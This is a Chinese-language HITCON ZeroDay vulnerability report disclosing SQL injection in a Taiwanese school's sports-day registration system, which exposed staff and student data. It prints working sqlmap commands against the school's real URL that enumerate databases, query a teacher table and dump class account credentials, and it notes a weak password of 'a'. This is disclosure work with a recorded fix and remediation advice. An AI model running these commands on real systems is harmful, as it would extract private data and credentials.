Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00619
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: 國立竹科實中 運動會登入系統SQLI導致其他系統機密資料嚴重外洩
- Introduction: 利用sqlmap等工具可以對表單注入攻擊進行資料爬取
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2023/10/19 20:52:10 : 新提交 (由 Whale120 更新此狀態)
- 2023/10/20 17:17:04 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/10/25 11:56:06 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/10/25 11:56:07 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/12/19 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2024/01/19 11:24:56 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/01/27 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00619
- 通報者:WH_ALE (Whale120)
- 風險:嚴重
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
https://jedi.nehs.hc.edu.tw/
敘述
由上一則回報點這裡發現了整套系統疑似有sql injection,在今天注意到運動會報名系統後決定著手做些嘗試,發現了sql injection漏洞並且會導致所有教職員個資外洩與部分學生資料外洩,也有些系統的帳號密碼洩漏,因此訂為嚴重問題。
以下是詳細資訊:
1.透過表單sql injection後確認有SQLI漏洞並且挖掘到了資料庫名稱列表:sqlmap --url "https://jedi.nehs.hc.edu.tw/sport/apply.php" --data "grd=4&cls=3&pwd=a" --dbs
得知為Error-Base系列弱點
2.帶有資訊確認
免責聲明,並未對資料做任何存取或二次利用,僅供判斷弱點嚴重性與對淺在地滲透方式進行確認
透過sqlmap的--sql-query參數可以直接查詢指定資訊
e.g.sqlmap --url "https://jedi.nehs.hc.edu.tw/sport/apply.php" --data "grd=4&cls=3&pwd=a" -D"TeacherExam" --sql-query="SELECT * FROM UserData WHERE Name='XXX'"
回到運動會系統,各班帳號密碼也皆被接露:
Payload:sqlmap --url "https://jedi.nehs.hc.edu.tw/sport/apply.php" --data "grd=4&cls=3&pwd=a" -D "FieldDay" -T "Class" --dump
最後,其他部分做的還不錯,也沒有洩漏phpmyadmin等可能導致RCE的帳號密碼(應該?),也有對很多資料做hash,單純就是SQL Injection帶來了不少傷害。
P.S. 上一則回報的系統密碼其實都是a,屬於很嚴重的弱密碼,建議改一下XD
修補建議
對輸進去的資料做filter, 編碼,總之就是防治sql injection的那些方式。